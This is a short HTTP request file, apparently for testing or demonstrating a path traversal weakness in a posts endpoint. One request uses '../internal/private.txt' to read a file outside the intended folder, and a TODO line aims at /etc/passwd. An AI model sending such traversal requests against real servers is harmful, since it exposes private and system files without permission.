### Get intro Post

GET {{baseUrl}}/static/posts?name=intro.txt

### Get private info

GET {{baseUrl}}/static/posts?name=../internal/private.txt

### TODO: Get /etc/passwd

GET {{baseUrl}}/static/posts?name=...

### Get all posts

GET {{baseUrl}}/api/posts
Content-Type: application/json
